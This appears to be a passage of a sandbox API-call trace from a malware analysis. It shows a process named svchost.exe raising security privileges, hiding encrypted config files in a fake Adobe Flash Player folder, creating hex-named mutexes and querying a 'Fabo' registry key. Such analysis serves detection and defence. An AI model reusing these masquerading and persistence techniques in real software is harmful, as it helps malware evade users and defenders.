GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x10 [0064.678] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0x10 [0064.678] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0x10 [0064.678] GetCurrentThread () returned 0xfffffffe [0064.678] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x65f1f4 | out: TokenHandle=0x65f1f4*=0x0) returned 0 [0064.678] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x65f1f4 | out: TokenHandle=0x65f1f4*=0x158) returned 1 [0064.678] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x65f1fc | out: lpLuid=0x65f1fc*(LowPart=0x8, HighPart=0)) returned 1 [0064.697] AdjustTokenPrivileges (in: TokenHandle=0x158, DisableAllPrivileges=0, NewState=0x65f1f8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0064.697] GetLastError () returned 0x0 [0064.698] CloseHandle (hObject=0x158) returned 1 [0064.698] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0064.698] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x4b14220, lpbSaclPresent=0x65f22c, pSacl=0x65f220, lpbSaclDefaulted=0x65f228 | out: lpbSaclPresent=0x65f22c, pSacl=0x65f220, lpbSaclDefaulted=0x65f228) returned 1 [0064.698] SetNamedSecurityInfoW () returned 0x0 [0064.708] LocalFree (hMem=0x4b14220) returned 0x0 [0064.708] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0x20 [0064.708] GetCurrentThread () returned 0xfffffffe [0064.708] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x65f1f4 | out: TokenHandle=0x65f1f4*=0x0) returned 0 [0064.708] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x65f1f4 | out: TokenHandle=0x65f1f4*=0x178) returned 1 [0064.708] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x65f1fc | out: lpLuid=0x65f1fc*(LowPart=0x8, HighPart=0)) returned 1 [0064.709] AdjustTokenPrivileges (in: TokenHandle=0x178, DisableAllPrivileges=0, NewState=0x65f1f8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0064.709] GetLastError () returned 0x0 [0064.709] CloseHandle (hObject=0x178) returned 1 [0064.709] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0064.709] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x4b140d0, lpbSaclPresent=0x65f22c, pSacl=0x65f220, lpbSaclDefaulted=0x65f228 | out: lpbSaclPresent=0x65f22c, pSacl=0x65f220, lpbSaclDefaulted=0x65f228) returned 1 [0064.709] SetNamedSecurityInfoW () returned 0x0 [0064.710] LocalFree (hMem=0x4b140d0) returned 0x0 [0064.711] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0064.711] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x65f240 | out: lpFileSize=0x65f240*=1361) returned 1 [0064.711] VirtualAlloc (lpAddress=0x0, dwSize=0x551, flAllocationType=0x3000, flProtect=0x4) returned 0x8d0000 [0064.712] ReadFile (in: hFile=0x178, lpBuffer=0x8d0000, nNumberOfBytesToRead=0x551, lpNumberOfBytesRead=0x65f24c, lpOverlapped=0x0 | out: lpBuffer=0x8d0000*, lpNumberOfBytesRead=0x65f24c*=0x551, lpOverlapped=0x0) returned 1 [0064.714] CloseHandle (hObject=0x178) returned 1 [0064.714] wvnsprintfA (in: pszDest=0x4c122e8, cchDest=21, pszFmt="%d", arglist=0x65f190 | out: pszDest="1476366141") returned 10 [0064.715] wvnsprintfA (in: pszDest=0x4c122e8, cchDest=21, pszFmt="%d", arglist=0x65f190 | out: pszDest="1476366141") returned 10 [0064.716] wvnsprintfA (in: pszDest=0x4c12348, cchDest=21, pszFmt="%d", arglist=0x65f190 | out: pszDest="1476366142") returned 10 [0064.717] wvnsprintfA (in: pszDest=0x4c12388, cchDest=21, pszFmt="%d", arglist=0x65f190 | out: pszDest="1476366142") returned 10 [0064.717] wvnsprintfA (in: pszDest=0x4c12428, cchDest=21, pszFmt="%d", arglist=0x65f190 | out: pszDest="1476366147") returned 10 [0064.718] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0064.727] WriteFile (in: hFile=0x178, lpBuffer=0x4c03988*, nNumberOfBytesToWrite=0x78f, lpNumberOfBytesWritten=0x65f244, lpOverlapped=0x0 | out: lpBuffer=0x4c03988*, lpNumberOfBytesWritten=0x65f244, lpOverlapped=0x0) returned 1 [0064.732] CloseHandle (hObject=0x178) returned 1 [0064.736] ReleaseMutex (hMutex=0x154) returned 1 [0064.736] CloseHandle (hObject=0x154) returned 1 [0064.736] SetLastError (dwErrCode=0x0) [0064.737] LocalFree (hMem=0x4b08748) returned 0x0 [0064.737] wvnsprintfW (in: pszDest=0x65f170, cchDest=6, pszFmt="%02X", arglist=0x65f14c | out: pszDest="4B") returned 2 [0064.737] wvnsprintfW (in: pszDest=0x65f170, cchDest=6, pszFmt="%02X", arglist=0x65f14c | out: pszDest="00") returned 2 [0064.737] wvnsprintfW (in: pszDest=0x65f170, cchDest=6, pszFmt="%02X", arglist=0x65f14c | out: pszDest="00") returned 2 [0064.737] wvnsprintfW (in: pszDest=0x65f170, cchDest=6, pszFmt="%02X", arglist=0x65f14c | out: pszDest="00") returned 2 [0064.737] wvnsprintfW (in: pszDest=0x65f170, cchDest=6, pszFmt="%02X", arglist=0x65f14c | out: pszDest="D5") returned 2 [0064.737] wvnsprintfW (in: pszDest=0x65f170, cchDest=6, pszFmt="%02X", arglist=0x65f14c | out: pszDest="86") returned 2 [0064.737] wvnsprintfW (in: pszDest=0x65f170, cchDest=6, pszFmt="%02X", arglist=0x65f14c | out: pszDest="D2") returned 2 [0064.737] wvnsprintfW (in: pszDest=0x65f170, cchDest=6, pszFmt="%02X", arglist=0x65f14c | out: pszDest="D8") returned 2 [0064.737] wvnsprintfW (in: pszDest=0x65f170, cchDest=6, pszFmt="%02X", arglist=0x65f14c | out: pszDest="AB") returned 2 [0064.737] wvnsprintfW (in: pszDest=0x65f170, cchDest=6, pszFmt="%02X", arglist=0x65f14c | out: pszDest="6E") returned 2 [0064.738] wvnsprintfW (in: pszDest=0x65f170, cchDest=6, pszFmt="%02X", arglist=0x65f14c | out: pszDest="07") returned 2 [0064.738] wvnsprintfW (in: pszDest=0x65f170, cchDest=6, pszFmt="%02X", arglist=0x65f14c | out: pszDest="EC") returned 2 [0064.738] wvnsprintfW (in: pszDest=0x65f170, cchDest=6, pszFmt="%02X", arglist=0x65f14c | out: pszDest="44") returned 2 [0064.738] wvnsprintfW (in: pszDest=0x65f170, cchDest=6, pszFmt="%02X", arglist=0x65f14c | out: pszDest="CC") returned 2 [0064.738] wvnsprintfW (in: pszDest=0x65f170, cchDest=6, pszFmt="%02X", arglist=0x65f14c | out: pszDest="91") returned 2 [0064.738] wvnsprintfW (in: pszDest=0x65f170, cchDest=6, pszFmt="%02X", arglist=0x65f14c | out: pszDest="83") returned 2 [0064.738] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="4B000000D586D2D8AB6E07EC44CC9183") returned 0x154 [0064.738] CloseHandle (hObject=0x154) returned 1 [0064.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x65f322, cbMultiByte=4, lpWideCharStr=0x5d0c50, cchWideChar=10 | out: lpWideCharStr="Fabo") returned 4 [0064.739] PathCombineW (in: pszDest=0x5d09e0, pszDir="SOFTWARE\\Microsoft", pszFile="Fabo" | out: pszDest="SOFTWARE\\Microsoft\\Fabo") returned="SOFTWARE\\Microsoft\\Fabo" [0064.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x65f32c, cbMultiByte=8, lpWideCharStr=0x5d0c50, cchWideChar=10 | out: lpWideCharStr="Onpiwaad") returned 8 [0064.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x65f1fa, cbMultiByte=48, lpWideCharStr=0x65ef28, cchWideChar=150 | out: lpWideCharStr="Adobe\\Flash Player\\Desktop (create shortcut).igb룔쑱섈︖百뫆沼⡹搫䅢髽覍ﮥ홂妖樁즗Լ౐]e") returned 48 [0064.739] PathCombineW (in: pszDest=0x5d0c68, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="Adobe\\Flash Player\\Desktop (create shortcut).igb" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Desktop (create shortcut).igb") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Desktop (create shortcut).igb" [0064.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x65f294, cbMultiByte=47, lpWideCharStr=0x65ef2c, cchWideChar=150 | out: lpWideCharStr="Adobe\\Flash Player\\Windows PowerShell (x86).ezu룔쑱섈︖百뫆沼⡹搫䅢髽覍ﮥ홂妖樁즗Լ౐]e") returned 47 [0064.740] PathCombineW (in: pszDest=0x5d0a48, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="Adobe\\Flash Player\\Windows PowerShell (x86).ezu" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Windows PowerShell (x86).ezu") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Windows PowerShell (x86).ezu" [0064.740] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Fabo", ulOptions=0x0, samDesired=0x1, phkResult=0x65f348 | out: phkResult=0x65f348*=0x178) returned 0x0 [0064.740] RegQueryValueExW (in: hKey=0x178, lpValueName="Onpiwaad", lpReserved=0x0, lpType=0x65f374, lpData=0x0, lpcbData=0x65f358*=0x0 | out: lpType=0x65f374*=0x0, lpData=0x0, lpcbData=0x65f358*=0x0) returned 0x2 [0064.740] RegCloseKey (hKey=0x178) returned 0x0 [0064.740] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Desktop (create shortcut).igb" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\desktop (create shortcut).igb"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0064.741] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x65f34c | out: lpFileSize=0x65f34c*=0) returned 1 [0064.741] CloseHandle (hObject=0x178) returned 1 [0064.741] GetLastError () returned 0x0 [0064.741] GetLastError () returned 0x0 [0064.741] GetLocalTime (in: lpSystemTime=0x65f358 | out: lpSystemTime=0x65f358*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2a, wSecond=0x1b, wMilliseconds=0x97)) [0064.741] GetCurrentThreadId () returned 0xc5c [0064.741] GetCurrentProcessId () returned 0xc54 [0064.741] wvnsprintfW (in: pszDest=0x4c01118, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0x65f2fc | out: pszDest="[13.10.2016 15:42:27] ver=2.2.5, log=0x0004, PID=0x0C54, TID=0x0C5C, LE=0(0x0)\r\nINFO: ") returned 86 [0064.741] wvnsprintfW (in: pszDest=0x4c011c4, cchDest=1962, pszFmt="DynamicConfig::getCurrent %u get crypted error %u.", arglist=0x65f37c | out: pszDest="DynamicConfig::getCurrent 1 get crypted error 0.") returned 48 [0064.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:27] ver=2.2.5, log=0x0004, PID=0x0C54, TID=0x0C5C, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 134 [0064.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:27] ver=2.2.5, log=0x0004, PID=0x0C54, TID=0x0C5C, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x4c02128, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:42:27] ver=2.2.5, log=0x0004, PID=0x0C54, TID=0x0C5C, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", lpUsedDefaultChar=0x0) returned 134 [0064.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:27] ver=2.2.5, log=0x0004, PID=0x0C54, TID=0x0C5C, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 134 [0064.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:27] ver=2.2.5, log=0x0004, PID=0x0C54, TID=0x0C5C, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x4c021c0, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:42:27] ver=2.2.5, log=0x0004, PID=0x0C54, TID=0x0C5C, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", lpUsedDefaultChar=0x0) returned 134 [0064.743] GetSystemTime (in: lpSystemTime=0x65ef48 | out: lpSystemTime=0x65ef48*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2a, wSecond=0x1b, wMilliseconds=0xa6)) [0064.743] SystemTimeToFileTime (in: lpSystemTime=0x65ef48, lpFileTime=0x65ef38 | out: lpFileTime=0x65ef38) returned 1 [0064.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0064.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x4c13098, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0064.743] GetUserNameExW () returned 0x1 [0064.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0064.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x4c120c8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0064.744] wvnsprintfW (in: pszDest=0x65ed30, cchDest=6, pszFmt="%02X", arglist=0x65ed0c | out: pszDest="8A") returned 2 [0064.744] wvnsprintfW (in: pszDest=0x65ed30, cchDest=6, pszFmt="%02X", arglist=0x65ed0c | out: pszDest="00") returned 2 [0064.745] wvnsprintfW (in: pszDest=0x65ed30, cchDest=6, pszFmt="%02X", arglist=0x65ed0c | out: pszDest="00") returned 2 [0064.745] wvnsprintfW (in: pszDest=0x65ed30, cchDest=6, pszFmt="%02X", arglist=0x65ed0c | out: pszDest="00") returned 2 [0064.745] wvnsprintfW (in: pszDest=0x65ed30, cchDest=6, pszFmt="%02X", arglist=0x65ed0c | out: pszDest="B7") returned 2 [0064.745] wvnsprintfW (in: pszDest=0x65ed30, cchDest=6, pszFmt="%02X", arglist=0x65ed0c | out: pszDest="49") returned 2 [0064.745] wvnsprintfW (in: pszDest=0x65ed30, cchDest=6, pszFmt="%02X", arglist=0x65ed0c | out: pszDest="67") returned 2 [0064.745] wvnsprintfW (in: pszDest=0x65ed30, cchDest=6, pszFmt="%02X", arglist=0x65ed0c | out: pszDest="98") returned 2 [0064.745] wvnsprintfW (in: pszDest=0x65ed30, cchDest=6, pszFmt="%02X", arglist=0x65ed0c | out: pszDest="F6") returned 2 [0064.745] wvnsprintfW (in: pszDest=0x65ed30, cchDest=6, pszFmt="%02X", arglist=0x65ed0c | out: pszDest="14") returned 2 [0064.745] wvnsprintfW (in: pszDest=0x65ed30, cchDest=6, pszFmt="%02X", arglist=0x65ed0c | out: pszDest="59") returned 2 [0064.745] wvnsprintfW (in: pszDest=0x65ed30, cchDest=6, pszFmt="%02X", arglist=0x65ed0c | out: pszDest="35") returned 2 [0064.745] wvnsprintfW (in: pszDest=0x65ed30, cchDest=6, pszFmt="%02X", arglist=0x65ed0c | out: pszDest="AA") returned 2 [0064.745] wvnsprintfW (in: pszDest=0x65ed30, cchDest=6, pszFmt="%02X", arglist=0x65ed0c | out: pszDest="3E") returned 2 [0064.745] wvnsprintfW (in: pszDest=0x65ed30, cchDest=6, pszFmt="%02X", arglist=0x65ed0c | out: pszDest="27") returned 2 [0064.745] wvnsprintfW (in: pszDest=0x65ed30, cchDest=6, pszFmt="%02X", arglist=0x65ed0c | out: pszDest="60") returned 2 [0064.745] CreateMutexW (lpMutexAttributes=0x5ce89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x178 [0064.746] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0xffffffff) returned 0x0 [0064.746] PathSkipRootW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0064.746] GetFileAttributesW (lpFileName="C:\\Users") returned 0x11 [0064.746] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe") returned 0x10 [0064.746] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData") returned 0x12 [0064.746] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x10 [0064.746] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0x10 [0064.747] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0x10 [0064.747] GetCurrentThread () returned 0xfffffffe [0064.747] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x65ef94 | out: TokenHandle=0x65ef94*=0x0) returned 0 [0064.747] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x65ef94 | out: TokenHandle=0x65ef94*=0x17c) returned 1 [0064.747] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x65ef9c | out: lpLuid=0x65ef9c*(LowPart=0x8, HighPart=0)) returned 1 [0064.748] AdjustTokenPrivileges (in: TokenHandle=0x17c, DisableAllPrivileges=0, NewState=0x65ef98*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0064.748] GetLastError () returned 0x0 [0064.748] CloseHandle (hObject=0x17c) returned 1 [0064.748] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0064.748] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x4b14250, lpbSaclPresent=0x65efcc, pSacl=0x65efc0, lpbSaclDefaulted=0x65efc8 | out: lpbSaclPresent=0x65efcc, pSacl=0x65efc0, lpbSaclDefaulted=0x65efc8) returned 1 [0064.748] SetNamedSecurityInfoW () returned 0x0 [0064.756] LocalFree (hMem=0x4b14250) returned 0x0 [0064.756] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0x20 [0064.756] GetCurrentThread () returned 0xfffffffe [0064.756] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x65ef94 | out: TokenHandle=0x65ef94*=0x0) returned 0 [0064.756] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x65ef94 | out: TokenHandle=0x65ef94*=0x17c) returned 1 [0064.756] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x65ef9c | out: lpLuid=0x65ef9c*(LowPart=0x8, HighPart=0)) returned 1 [0064.758] AdjustTokenPrivileges (in: TokenHandle=0x17c, DisableAllPrivileges=0, NewState=0x65ef98*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0064.758] GetLastError () returned 0x0 [0064.758] CloseHandle (hObject=0x17c) returned 1 [0064.758] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0064.758] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x4b141f0, lpbSaclPresent=0x65efcc, pSacl=0x65efc0, lpbSaclDefaulted=0x65efc8 | out: lpbSaclPresent=0x65efcc, pSacl=0x65efc0, lpbSaclDefaulted=0x65efc8) returned 1 [0064.758] SetNamedSecurityInfoW () returned 0x0 [0064.760] LocalFree (hMem=0x4b141f0) returned 0x0 [0064.760] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0064.761] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x65efe0 | out: lpFileSize=0x65efe0*=1935) returned 1 [0064.761] VirtualAlloc (lpAddress=0x0, dwSize=0x78f, flAllocationType=0x3000, flProtect=0x4) returned 0x8d0000 [0064.761] ReadFile (in: hFile=0x17c, lpBuffer=0x8d0000, nNumberOfBytesToRead=0x78f, lpNumberOfBytesRead=0x65efec, lpOverlapped=0x0 | out: lpBuffer=0x8d0000*, lpNumberOfBytesRead=0x65efec*=0x78f, lpOverlapped=0x0) returned 1 [0064.764] CloseHandle (hObject=0x17c) returned 1 [0064.764] wvnsprintfA (in: pszDest=0x4c12548, cchDest=21, pszFmt="%d", arglist=0x65ef30 | out: pszDest="1476366141") returned 10 [0064.765] wvnsprintfA (in: pszDest=0x4c12508, cchDest=21, pszFmt="%d", arglist=0x65ef30 | out: pszDest="1476366141") returned 10 [0064.766] wvnsprintfA (in: pszDest=0x4c12508, cchDest=21, pszFmt="%d", arglist=0x65ef30 | out: pszDest="1476366142") returned 10 [0064.767] wvnsprintfA (in: pszDest=0x4c12508, cchDest=21, pszFmt="%d", arglist=0x65ef30 | out: pszDest="1476366142") returned 10 [0064.768] wvnsprintfA (in: pszDest=0x4c12508, cchDest=21, pszFmt="%d", arglist=0x65ef30 | out: pszDest="1476366147") returned 10 [0064.769] wvnsprintfA (in: pszDest=0x4c12508, cchDest=21, pszFmt="%d", arglist=0x65ef30 | out: pszDest="1476366147") returned 10 [0064.770] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0064.772] WriteFile (in: hFile=0x17c, lpBuffer=0x4c03390*, nNumberOfBytesToWrite=0x891, lpNumberOfBytesWritten=0x65efe4, lpOverlapped=0x0 | out: lpBuffer=0x4c03390*, lpNumberOfBytesWritten=0x65efe4, lpOverlapped=0x0) returned 1 [0064.874] CloseHandle (hObject=0x17c) returned 1 [0064.879] ReleaseMutex (hMutex=0x178) returned 1 [0064.879] CloseHandle (hObject=0x178) returned 1 [0064.879] SetLastError (dwErrCode=0x0) [0064.879] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0xea60) returned 0x102 [0124.915] wvnsprintfW (in: pszDest=0x65f160, cchDest=6, pszFmt="%02X", arglist=0x65f13c | out: pszDest="D5") returned 2 [0124.915] wvnsprintfW (in: pszDest=0x65f160, cchDest=6, pszFmt="%02X", arglist=0x65f13c | out: pszDest="00") returned 2 [0124.915] wvnsprintfW (in: pszDest=0x65f160, cchDest=6, pszFmt="%02X", arglist=0x65f13c | out: pszDest="00") returned 2 [0124.916] wvnsprintfW (in: pszDest=0x65f160, cchDest=6, pszFmt="%02X", arglist=0x65f13c | out: pszDest="00") returned 2 [0124.916] wvnsprintfW (in: pszDest=0x65f160, cchDest=6, pszFmt="%02X", arglist=0x65f13c | out: pszDest="C7") returned 2 [0124.916] wvnsprintfW (in: pszDest=0x65f160, cchDest=6, pszFmt="%02X", arglist=0x65f13c | out: pszDest="0E") returned 2 [0124.916] wvnsprintfW (in: pszDest=0x65f160, cchDest=6, pszFmt="%02X", arglist=0x65f13c | out: pszDest="48") returned 2 [0124.916] wvnsprintfW (in: pszDest=0x65f160, cchDest=6, pszFmt="%02X", arglist=0x65f13c | out: pszDest="D5") returned 2 [0124.916] wvnsprintfW (in: pszDest=0x65f160, cchDest=6, pszFmt="%02X", arglist=0x65f13c | out: pszDest="40") returned 2 [0124.916] wvnsprintfW (in: pszDest=0x65f160, cchDest=6, pszFmt="%02X", arglist=0x65f13c | out: pszDest="82") returned 2 [0124.916] wvnsprintfW (in: pszDest=0x65f160, cchDest=6, pszFmt="%02X", arglist=0x65f13c | out: pszDest="51") returned 2 [0124.916] wvnsprintfW (in: pszDest=0x65f160, cchDest=6, pszFmt="%02X", arglist=0x65f13c | out: 